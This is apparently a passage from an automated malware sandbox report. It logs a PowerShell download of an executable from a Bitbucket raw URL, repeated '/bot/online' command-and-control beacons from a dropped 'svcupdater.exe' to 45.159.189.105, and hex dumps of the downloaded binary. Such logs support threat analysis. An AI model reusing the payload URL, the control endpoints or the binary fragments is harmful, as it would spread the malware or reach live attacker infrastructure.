Oct 4, 2024 19:13:23.770977974 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.771004915 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.855992079 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.856054068 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.856241941 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.856241941 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.856266022 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.856308937 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.856389999 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.856431007 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.856452942 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.856458902 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.856487036 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.856506109 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.857270002 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.857311010 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.857336044 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.857340097 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.857366085 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.857386112 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.858009100 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.858087063 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.858112097 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.858117104 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.858144045 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.858165026 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.858634949 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.858696938 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.858720064 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.858724117 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.858752012 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.858768940 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.859424114 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.859467030 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.859492064 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.859496117 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.859522104 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.859540939 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.859996080 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.860037088 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.860061884 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.860065937 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.860099077 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.860107899 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.861908913 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.861968040 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.861977100 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.861996889 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.862025023 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.862042904 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947109938 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.947186947 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.947218895 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947240114 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.947254896 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947274923 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947299004 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.947360992 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947365999 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.947401047 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947482109 CEST | 443 | 49732 | 185.166.143.49 | 192.168.2.4
Oct 4, 2024 19:13:23.947527885 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:23.947685957 CEST | 49732 | 443 | 192.168.2.4 | 185.166.143.49
Oct 4, 2024 19:13:58.174817085 CEST | 49739 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:58.180110931 CEST | 80 | 49739 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:13:58.180177927 CEST | 49739 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:58.180351973 CEST | 49739 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:58.185339928 CEST | 80 | 49739 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:13:59.780472994 CEST | 80 | 49739 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:13:59.781016111 CEST | 49739 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:59.787276983 CEST | 49739 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:59.792288065 CEST | 80 | 49739 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:13:59.802254915 CEST | 49740 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:59.807775974 CEST | 80 | 49740 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:13:59.810719013 CEST | 49740 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:59.810854912 CEST | 49740 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:13:59.815968990 CEST | 80 | 49740 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:01.487971067 CEST | 80 | 49740 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:01.488048077 CEST | 49740 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:01.488142014 CEST | 49740 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:01.492988110 CEST | 80 | 49740 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:55.842169046 CEST | 50007 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:55.847628117 CEST | 80 | 50007 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:55.847707033 CEST | 50007 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:55.861872911 CEST | 50007 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:55.866754055 CEST | 80 | 50007 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:57.437105894 CEST | 80 | 50007 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:57.437284946 CEST | 50007 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:57.437643051 CEST | 50007 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:57.442526102 CEST | 80 | 50007 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:57.463434935 CEST | 50008 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:57.468627930 CEST | 80 | 50008 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:57.468739986 CEST | 50008 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:57.468914986 CEST | 50008 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:57.473854065 CEST | 80 | 50008 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:59.158466101 CEST | 80 | 50008 | 45.159.189.105 | 192.168.2.4
Oct 4, 2024 19:14:59.158696890 CEST | 50008 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:59.158795118 CEST | 50008 | 80 | 192.168.2.4 | 45.159.189.105
Oct 4, 2024 19:14:59.163624048 CEST | 80 | 50008 | 45.159.189.105 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 19:13:17.776415110 CEST | 60776 | 53 | 192.168.2.4 | 1.1.1.1
Oct 4, 2024 19:13:17.784015894 CEST | 53 | 60776 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2024 19:13:17.776415110 CEST | 192.168.2.4 | 1.1.1.1 | 0xc95a | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2024 19:13:17.784015894 CEST | 1.1.1.1 | 192.168.2.4 | 0xc95a | No error (0) | bitbucket.org |  | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 19:13:17.784015894 CEST | 1.1.1.1 | 192.168.2.4 | 0xc95a | No error (0) | bitbucket.org |  | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 19:13:17.784015894 CEST | 1.1.1.1 | 192.168.2.4 | 0xc95a | No error (0) | bitbucket.org |  | 185.166.143.48 | A (IP address) | IN (0x0001) | false
                                                                                                  • bitbucket.org
                                                                                                  • 45.159.189.105
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 45.159.189.105 | 80 | 7904 | C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 19:13:58.180351973 CEST | 74 | OUT | GET /bot/regex HTTP/1.1
Host: 45.159.189.105
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 45.159.189.105 | 80 | 7904 | C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 19:13:59.810854912 CEST | 163 | OUT | GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1
Host: 45.159.189.105
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 50007 | 45.159.189.105 | 80 | 7904 | C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 19:14:55.861872911 CEST | 74 | OUT | GET /bot/regex HTTP/1.1
Host: 45.159.189.105
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 50008 | 45.159.189.105 | 80 | 7904 | C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 19:14:57.468914986 CEST | 163 | OUT | GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1
Host: 45.159.189.105
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.166.143.49 | 443 | 7520 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-04 17:13:18 UTC | 133 | OUT | GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1
                                                                                                  Host: bitbucket.org
                                                                                                  Connection: Keep-Alive
2024-10-04 17:13:18 UTC | 4027 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Fri, 04 Oct 2024 17:13:18 GMT
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Content-Length: 208896
                                                                                                  Server: AtlassianEdge
                                                                                                  Content-Disposition: attachment
                                                                                                  Vary: Authorization, Accept-Language, Origin
                                                                                                  Cache-Control: s-maxage=900, max-age=900
                                                                                                  Last-Modified: Fri, 13 Jan 2023 16:15:26 GMT
                                                                                                  Etag: "f86a21d93d1512100b4e770b711578bd"
                                                                                                  X-Used-Mesh: False
                                                                                                  Content-Language: en
                                                                                                  X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                  X-Dc-Location: Micros-3
                                                                                                  X-Served-By: cb62c73099d7
                                                                                                  X-Version: 8e66bccd2be3
                                                                                                  X-Static-Version: 8e66bccd2be3
                                                                                                  X-Request-Count: 3686
                                                                                                  X-Render-Time: 0.08218693733215332
                                                                                                  X-B3-Traceid: f1df42db292e4290aaad5c0ec7394b29
                                                                                                  X-B3-Spanid: 66db5b712a9b74dc
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com ap [TRUNCATED]
                                                                                                  X-Usage-Quota-Remaining: 996071.813
                                                                                                  X-Usage-Request-Cost: 3951.77
                                                                                                  X-Usage-User-Time: 0.032570
                                                                                                  X-Usage-System-Time: 0.015983
                                                                                                  X-Usage-Input-Ops: 280
                                                                                                  X-Usage-Output-Ops: 0
                                                                                                  Age: 483
                                                                                                  Accept-Ranges: bytes
                                                                                                  X-Cache: HIT
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                  Atl-Traceid: 61c489dfb9144c0ba001fe9d249590dc
                                                                                                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                  Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=2,atl-edge-upstream;dur=92,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                  Connection: close
                                                                                                  2024-10-04 17:13:18 UTC12357INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0d b0 bd 17 49 d1 d3 44 49 d1 d3 44 49 d1 d3 44 7f f7 d8 44 48 d1 d3 44 ca cd dd 44 5d d1 d3 44 7f f7 d9 44 02 d1 d3 44 8a de 8e 44 44 d1 d3 44 49 d1 d2 44 21 d1 d3 44 a1 ce d9 44 48 d1 d3 44 49 d1 d3 44 48 d1 d3 44 52 69 63 68 49 d1 d3 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0b 52 a9 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 90 00 00 00 a0 02 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$IDIDIDDHDD]DDDDDDID!DDHDIDHDRichIDPELRc
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 45 cc 89 45 c4 8b 45 e0 83 60 28 00 83 7d c4 00 74 4c 8b 45 c4 89 45 c8 8b 45 c8 8b 40 28 3b 45 cc 74 0b 8b 45 c8 8b 40 28 89 45 bc eb 04 83 65 bc 00 8b 45 bc 89 45 c4 8b 45 c8 8b 40 04 89 45 b8 83 7d b8 01 74 02 eb 13 ff 75 c8 8b 45 c8 ff 30 ff 75 e0 e8 7b eb ff ff 83 c4 0c eb ae 8b 45 e0 83 78 2c 00 0f 84 ca 00 00 00 8b 45 e0 8b 40 2c 89 45 c0 8b 45 e0 8b 4d c0 8b 49 18 89 48 2c 8b 45 c0 8b 40 1c 24 fb 8b 4d c0 89 41 1c 8b 45 c0 8b 40 0c 89 45 b4 83 7d b4 01 74 1a 83 7d b4 03 74 05 e9 88 00 00 00 ff 75 c0 ff 75 e0 e8 b5 e3 ff ff 59 59 eb 79 8b 45 c0 8b 40 1c 83 e0 01 85 c0 74 6c 8b 45 c0 0f be 40 50 85 c0 75 61 8b 45 c0 8b 40 14 8b 4d c0 8b 49 10 89 08 8b 45 c0 8b 40 10 8b 4d c0 8b 49 14 89 48 04 33 c0 85 c0 75 dd 8b 45 c0 8b 40 08 8b 40 04 48 8b 4d c0
                                                                                                  Data Ascii: EEE`(}tLEEE@(;EtE@(EeEEE@E}tuE0u{Ex,E@,EEMIH,E@$MAE@E}t}tuuYYyE@tlE@PuaE@MIE@MIH3uE@@HM
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 12 43 00 20 8a 94 05 ec fc ff ff eb e3 80 a0 c0 11 43 00 00 40 41 41 3b c6 72 bf eb 49 33 c0 be 00 01 00 00 83 f8 41 72 19 83 f8 5a 77 14 80 88 c1 12 43 00 10 8a c8 80 c1 20 88 88 c0 11 43 00 eb 1f 83 f8 61 72 13 83 f8 7a 77 0e 80 88 c1 12 43 00 20 8a c8 80 e9 20 eb e0 80 a0 c0 11 43 00 00 40 3b c6 72 be 5e c9 c3 83 3d e8 14 43 00 00 75 12 6a fd e8 18 fc ff ff 59 c7 05 e8 14 43 00 01 00 00 00 c3 ff 35 9c 10 43 00 ff 74 24 08 e8 03 00 00 00 59 59 c3 83 7c 24 04 e0 77 22 ff 74 24 04 e8 1c 00 00 00 85 c0 59 75 16 39 44 24 08 74 10 ff 74 24 04 e8 aa 13 00 00 85 c0 59 75 de 33 c0 c3 55 8b ec 6a ff 68 88 cb 42 00 68 54 5b 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 0c 53 56 57 a1 d4 13 43 00 83 f8 03 75 43 8b 75 08 3b 35 a8 11 43 00 0f 87 93 00 00 00
                                                                                                  Data Ascii: C C@AA;rI3ArZwC CarzwC C@;r^=CujYC5Ct$YY|$w"t$Yu9D$tt$Yu3UjhBhT[@dPd%SVWCuCu;5C
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 09 44 00 00 00 1d 20 09 44 00 00 00 1d 08 00 00 00 00 1e 09 10 00 00 00 08 00 00 00 00 20 09 10 00 00 00 1d 21 08 09 20 00 00 00 08 1e 04 00 00 05 20 09 14 00 00 00 09 20 00 00 00 1d 20 09 10 00 00 00 1d 21 08 09 24 00 00 00 08 14 04 00 00 05 20 09 1c 00 00 00 09 24 00 00 00 1d 20 09 10 00 00 00 1d 09 40 00 00 00 1d 26 1b 21 08 09 28 00 00 00 08 e0 03 00 00 05 20 09 18 00 00 00 09 28 00 00 00 1d 20 09 18 00 00 00 1d 08 00 00 00 00 10 a4 04 00 00 09 1c 00 00 00 1d 04 38 00 00 00 08 e6 04 00 00 0a 09 18 00 00 00 1d 21 08 09 14 00 00 00 1d 23 21 0c 09 2c 00 00 00 08 4b 04 00 00 05 20 09 30 00 00 00 09 1c 00 00 00 1d 09 44 00 00 00 1d 26 20 09 30 00 00 00 1d 09 30 00 00 00 1d 1b 09 2c 00 00 00 1d 2f 1e 09 14 00 00 00 1d 08 00 00 00 00 10 da 04 00 00 09 18 00
                                                                                                  Data Ascii: D D ! !$ $ @&!( ( 8!#!,K 0D& 00,/
                                                                                                  2024-10-04 17:13:19 UTC6338INData Raw: 46 39 4f 41 50 55 44 59 41 43 59 34 39 47 39 48 5a 4d 49 53 52 51 45 59 47 49 41 59 5a 58 35 52 45 44 52 37 59 45 44 59 41 4d 4d 4d 52 39 35 41 4b 58 4b 52 49 41 45 4b 43 45 46 38 41 35 35 37 43 57 35 48 55 51 49 51 50 43 44 41 59 46 51 58 53 34 4d 42 4f 57 42 51 42 48 51 47 41 4c 4a 57 43 36 48 4d 38 45 51 4e 41 59 45 50 45 48 49 34 49 56 5a 48 59 46 39 4f 58 53 4d 4f 42 42 45 45 52 44 5a 42 43 50 50 49 59 45 4f 52 51 41 46 36 43 45 55 4d 44 46 4b 42 50 51 42 49 41 48 42 57 45 4c 38 45 45 41 4c 36 41 45 47 55 41 48 42 55 49 4c 38 45 46 41 4c 36 44 38 44 54 35 4e 51 4b 57 4a 52 50 59 51 59 42 50 51 4f 51 50 39 42 51 51 4c 38 45 56 49 36 42 50 51 4e 51 50 39 42 4f 55 4c 32 30 30 31 31 32 31 32 32 32 31 32 38 45 49 41 4c 36 44 34 36 51 50 39 42 4d 59 43 38
                                                                                                  Data Ascii: F9OAPUDYACY49G9HZMISRQEYGIAYZX5REDR7YEDYAMMMR95AKXKRIAEKCEF8A557CW5HUQIQPCDAYFQXS4MBOWBQBHQGALJWC6HM8EQNAYEPEHI4IVZHYF9OXSMOBBEERDZBCPPIYEORQAF6CEUMDFKBPQBIAHBWEL8EEAL6AEGUAHBUIL8EFAL6D8DT5NQKWJRPYQYBPQOQP9BQQL8EVI6BPQNQP9BOUL2001121222128EIAL6D46QP9BMYC8
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 42 47 44 35 59 53 39 49 4a 41 49 4c 59 57 46 36 55 43 55 48 39 39 4f 58 55 47 52 53 43 4e 4f 41 37 43 43 42 36 51 39 5a 44 53 38 37 4d 56 39 37 43 38 52 41 35 37 50 39 55 41 51 37 55 5a 52 56 43 38 41 49 5a 51 4e 45 47 50 41 59 42 44 47 41 45 4e 52 51 49 37 45 54 54 50 46 37 59 50 51 53 51 54 43 51 4c 37 36 41 41 41 38 41 36 46 53 37 53 53 38 37 5a 50 52 45 58 5a 57 4b 4a 57 45 57 58 53 44 44 34 46 58 42 56 41 43 4d 44 51 44 4a 49 55 45 4e 41 56 48 45 55 48 36 36 53 4a 45 4b 47 55 4c 56 46 50 41 42 46 50 42 4c 58 51 4d 43 45 55 4c 5a 41 4a 43 4d 38 5a 38 36 41 41 4c 59 47 39 41 37 50 45 37 47 48 4f 57 49 58 45 38 45 51 43 41 45 4c 51 38 36 58 51 53 50 59 35 48 38 4f 53 4f 54 46 49 46 42 42 54 4a 57 5a 54 38 34 52 52 41 56 53 57 4b 45 39 37 49 56 51 53 4d
                                                                                                  Data Ascii: BGD5YS9IJAILYWF6UCUH99OXUGRSCNOA7CCB6Q9ZDS87MV97C8RA57P9UAQ7UZRVC8AIZQNEGPAYBDGAENRQI7ETTPF7YPQSQTCQL76AAA8A6FS7SS87ZPREXZWKJWEWXSDD4FXBVACMDQDJIUENAVHEUH66SJEKGULVFPABFPBLXQMCEULZAJCM8Z86AALYG9A7PE7GHOWIXE8EQCAELQ86XQSPY5H8OSOTFIFBBTJWZT84RRAVSWKE97IVQSM
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 44 4e 44 54 45 47 55 55 4c 4d 4f 41 56 49 52 52 42 4d 4a 42 46 4b 4d 54 43 4c 37 4f 46 53 49 52 41 34 42 45 42 47 42 4b 4a 4f 4d 58 43 38 56 47 46 45 4c 4d 4f 4d 51 51 39 59 55 54 43 41 45 59 46 41 52 4d 58 47 4c 37 44 51 4e 59 59 51 43 44 44 35 4a 51 34 48 44 45 44 34 49 53 5a 4e 41 4e 45 51 57 5a 4a 58 49 47 55 45 54 49 56 50 38 45 50 49 53 52 4a 34 36 5a 50 51 49 36 55 48 36 4b 56 4e 5a 52 58 45 36 4b 48 34 42 39 55 49 57 4c 54 46 36 39 5a 49 4f 4b 44 34 41 45 47 47 4c 54 42 55 54 37 45 41 4b 58 47 37 59 50 51 57 45 44 52 49 49 56 4e 44 49 44 39 49 46 50 4b 44 55 50 34 53 35 45 45 5a 59 42 5a 49 4f 4d 54 4a 5a 53 43 34 44 36 55 55 4c 48 54 4e 4b 41 48 43 51 52 4e 53 35 49 58 43 49 4b 46 54 55 57 55 37 54 5a 41 41 46 59 4b 46 41 41 49 4d 4c 42 34 4e 38
                                                                                                  Data Ascii: DNDTEGUULMOAVIRRBMJBFKMTCL7OFSIRA4BEBGBKJOMXC8VGFELMOMQQ9YUTCAEYFARMXGL7DQNYYQCDD5JQ4HDED4ISZNANEQWZJXIGUETIVP8EPISRJ46ZPQI6UH6KVNZRXE6KH4B9UIWLTF69ZIOKD4AEGGLTBUT7EAKXG7YPQWEDRIIVNDID9IFPKDUP4S5EEZYBZIOMTJZSC4D6UULHTNKAHCQRNS5IXCIKFTUWU7TZAAFYKFAAIMLB4N8
                                                                                                  2024-10-04 17:13:19 UTC16384INData Raw: 4d 4f 41 58 4f 4b 54 49 53 52 47 57 51 48 44 49 51 52 47 57 51 42 59 4f 4e 42 34 45 34 5a 5a 34 43 44 34 34 46 50 54 35 4f 4a 5a 4f 4f 44 36 46 4d 58 51 49 43 47 55 51 39 53 42 39 57 42 59 44 4c 37 38 4f 4a 41 45 4d 34 50 4b 48 39 4d 51 49 4f 4c 47 59 4c 35 42 4f 41 58 59 47 44 4d 52 38 41 41 35 58 41 35 54 51 38 54 44 38 52 34 47 59 4f 4f 35 4f 47 51 46 51 53 46 55 50 59 4f 58 44 49 50 57 46 47 36 58 49 51 58 4d 56 38 37 53 41 4d 42 48 4a 42 55 4b 54 48 50 44 4b 4c 4d 44 47 57 44 38 44 52 49 37 44 52 4d 4f 51 47 59 4b 59 4b 41 44 57 44 34 44 38 4f 44 38 48 57 55 53 58 51 56 34 38 51 44 36 45 36 54 55 56 48 37 42 46 4e 38 49 4b 41 4b 52 35 4d 49 37 36 4f 37 42 42 4d 5a 43 57 45 45 4c 49 34 49 41 39 39 4e 44 55 41 4e 42 34 42 42 45 45 4e 46 53 48 52 35 44
                                                                                                  Data Ascii: MOAXOKTISRGWQHDIQRGWQBYONB4E4ZZ4CD44FPT5OJZOOD6FMXQICGUQ9SB9WBYDL78OJAEM4PKH9MQIOLGYL5BOAXYGDMR8AA5XA5TQ8TD8R4GYOO5OGQFQSFUPYOXDIPWFG6XIQXMV87SAMBHJBUKTHPDKLMDGWD8DRI7DRMOQGYKYKADWD4D8OD8HWUSXQV48QD6E6TUVH7BFN8IKAKR5MI76O7BBMZCWEELI4IA99NDUANB4BBEENFSHR5D
